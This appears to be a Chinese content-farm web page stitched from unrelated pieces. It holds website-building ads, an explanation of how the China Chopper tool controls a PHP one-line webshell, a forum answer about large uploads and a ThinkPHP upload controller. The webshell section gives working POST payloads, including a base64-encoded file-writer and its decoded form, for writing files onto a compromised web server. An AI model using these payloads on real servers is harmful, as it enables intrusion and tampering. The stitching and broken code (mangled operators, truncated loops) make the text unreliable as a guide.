重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。
柯坪网站建设公司创新互联,柯坪网站设计制作,有大型网站制作公司丰富经验。已为柯坪上1000家提供企业网站建设服务。企业网站搭建\成都外贸网站制作要多少钱,请找那个售后服务好的柯坪做网站的公司定做!
下面是最常见的php一句话木马:
当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。
那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。
因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:
POST:
1=@eval($_POST[z0]);z0=echo $_SERVER['DOCUMENT_ROOT'];
上面代码包含2个部分:
1. 一句话的密码
2. 发送给服务器端的php执行代码
既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能:
POST:
1=@eval(base64_decode($_POST[z0]));z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7z1=L3Zhci93d3cvcm9vdC8xLnR4dA==z2=aGVsbG8gd29ybGQh
仔细分析一下这段POST数据包含以下几个部分:
1. 首先是php一句话的密码1
2. 通过eval方法来执行base64解码后的z0,解码整理后显示如下:
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("-|");;
$f=base64_decode($_POST["z1"]);
$c=base64_decode($_POST["z2"]);
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i
3. 在z0中继续调用base64解码后的z1和z2,解码后如下:
z1=/var/www/root/1.txt
z2=hello world!
至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器
1.首先还是查看环境是否支持超大容量上传的支持,500M以上的文件通常为视频文件;
2.即然他要上传500M以上的文件,估计服务器性能必定非同凡想,所以暂可不考虑服务器硬件配置问题,但一定要考虑到网速问题,建议1000M以上出入速率,如少于这个数,你可以放弃这个方案了;
3.前面硬件都过关了,但程序也要加强了,一下上传500M是哪种语言都不能实现的,唯一解决方案,文件切割,如迅雷下载原理一样(采用续点上传),分成若干小块,然后全部上传完毕以后,再进行文件合成。
4.至于PHP的文件切割,切割后上传,以及文件合并,此类代码网上有许多,楼主可查询并选择适合你的代码,实现你的功能!
?php
class FileAction extends Action {
public function Index()
{
//print_r(__URL__);
$file = M('file');
$list = $file-select();
$this-assign('filelist',$list);
$this-display();
}
public function upload()
{
//文件上传的地址上传给它,并且上传完成后返回一个信息,让其写入数据库
//如果$_FILES为空的画,我就让action给出一个错误提示,告诉用户必须选择上传文件。如果有上传文件,则调用up方法
//$_FILES = $this-_post('file');
//print_r($_FILES);
if (empty($_FILES)) {
$this-error('必须选择上传文件');
}else {
$a = $this-Up();
//print_r($a);
if (isset($a)) {
//写入数据库方法
if($this-c($a)) {
$this-success('上传成功');
}else {
$this-error('写入数据库失败');
}
}else {
$this-error('上传文件有异常请与系统管理员联系');
}
}
}
private function c($data)
{
//print_r($data);
$file=M('file');
$num = '0';
for($i = 0; $i count($data)-1; $i++) {
$data['filename']=$data[$i]['savename'];
if( $file-data($data)-add())
{
$num++;
}
}
if($num==count($data)-1)
{
return true;
}else {
return false;
}
}
// private function c($data)
// {
// $file = M('file');
// $data['filename'] = $data[0]['savename'];
// if ($file-data($data)-add()) {
// return true;
// }else {
// return false;
// }
// }
//在这个方法当中,完成与thinkphp相关的,文件上传类的调用
private function Up()
{
//echo '模拟上传';
//基本上传功能
//批量上传功能
//生成图片缩略图
//自定义参数上传
//上传检测(大小,后缀,mime类型)
//支持覆盖方式上传
//上传类型,附件大小,上传路径定义
//支持hash或者日期子目录保存上传文件
//上传图片的安全性检测
//对上传文件的hash检测
//上传文件名自定义规范
import('@.ORG.UploadFile');
import('@.ORG.Image');
$upload = new UploadFile();
$upload-maxSize = '1000000'; //指上传文件大小,默认为-1,不限制大小(bytes)
$upload-savePath = './Public/'; //上传保存到什么地方?路径建议保存到入口文件平级或平级目录的子目录
$upload-saveRule = 'uniqid'; //上传文件的文件名保存规则 time uniqid(默认) com_create_guid
$upload-hashType = 'md5_file';
$upload-autoCheck = true; //是否自动检测附件 默认true
$upload-uploadReplace = true; //如果存在同名文件是否进行覆盖
$upload-allowExts = array('jpg','jpeg','png','gif'); //允许上传的文件后缀
$upload-allowPath = array('image/png','image/jpg','image/pjpeg','image/gif','image/jpeg'); //检测mime类型
$upload-thumb = true; // 是否开启图片文件缩略
$upload-thumbMaxWidth = '300,500';//缩略图最大宽度
$upload-thumbMaxHeight = '200,400';//最大高度
$upload-thumbPrefix = 's-,m-';//缩略图文件前缀
//$upload-thumbSuffix = '_s,_m';//文件后缀
//$upload-thumbPath = '';//如果留空直接上传至
//$upload-thumbFile 在数据库中也存一个文件名即可
$upload-thumbRemoveOrigin = 1; //如果生成缩略图,是否删除原图
//$upload-autoSub 是否使用子目录进行保存上传文件
//$upload-subType='' 子目录创建方式默认为hash 也可以为date
//$upload-dateFormat 子目录方式date的指定日期格式
//$upload-hashLevle
//upload() 如果上传成功返回true,失败返回false
if ($upload-upload()) {
$info = $upload-getUploadFileInfo();
return $info;
}else {
//是专门来获取上传的错误信息的
$this-error($upload-getErrorMsg());
}
}
}
?